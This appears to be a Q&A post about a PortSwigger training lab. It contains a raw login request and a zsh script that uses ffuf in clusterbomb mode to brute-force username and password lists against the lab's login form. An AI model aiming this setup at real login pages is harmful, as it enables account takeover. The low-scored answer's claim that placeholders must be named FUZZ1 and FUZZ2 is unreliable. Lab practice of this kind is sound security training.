# FFUF command returns status code 400, regardless of mode option: clusterbomb, pitchfork, sniper

Tags: passwords, password-cracking, brute-force, enumeration, user-enumeration

I'm working on a lab on PortSwigger.com titled **Username enumeration via different responses**. While using `ffuf` to solve the lab, the output keeps returning a `400` status code.

So far this is what I've tried. Here is the request payload file, as well as the script file. Note that in the script file, I'm using `-mode clusterbomb`. However, that doesn't matter because the same status code returns when using `-mode sniper`:

```
POST /login HTTP/2
Host: 0a470020046a9a9e82dcf24e005100d9.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://0a470020046a9a9e82dcf24e005100d9.web-security-academy.net
Connection: keep-alive
Referer: https://0a470020046a9a9e82dcf24e005100d9.web-security-academy.net/login
Cookie: session=IuAfPDAxBDUC0ePVk9a9AAF3giPAyWYV
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

username=U&password=P
```

```
#!/usr/bin/env zsh

printf "\nsending request: enumerating ..\n"
ffuf -request ./reqsPayload.txt \
-request-proto http \
-mode clusterbomb \
-w ./payloadsCredentials/usernames1.txt:U \
-w ./payloadsCredentials/passwords1.txt:P \
-mc all \
-t 1 \
-p 1.0-2.0 \
-ic \
-se | tee ./resp.txt
```

Answer (score 0):

When fuzzing a target with `ffuf`, the target parameter must be `FUZZ`, `FUZZ1`, `FUZZ2`, etc.

In other words change `U` to `FUZZ1` and `P` to `FUZZ2`:

```
POST /login HTTP/2
Host: 0a470020046a9a9e82dcf24e005100d9.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://0a470020046a9a9e82dcf24e005100d9.web-security-academy.net
Connection: keep-alive
Referer: https://0a470020046a9a9e82dcf24e005100d9.web-security-academy.net/login
Cookie: session=IuAfPDAxBDUC0ePVk9a9AAF3giPAyWYV
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

username=FUZZ1&password=FUZZ2
```

```
#!/usr/bin/env zsh

printf "\nsending request: enumerating ..\n"
ffuf -request ./reqsPayload.txt \
-request-proto http \
-mode clusterbomb \
-w ./payloadsCredentials/usernames1.txt:FUZZ1 \
-w ./payloadsCredentials/passwords1.txt:FUZZ2 \
-mc all \
-t 1 \
-p 1.0-2.0 \
-ic \
-se | tee ./resp.txt
```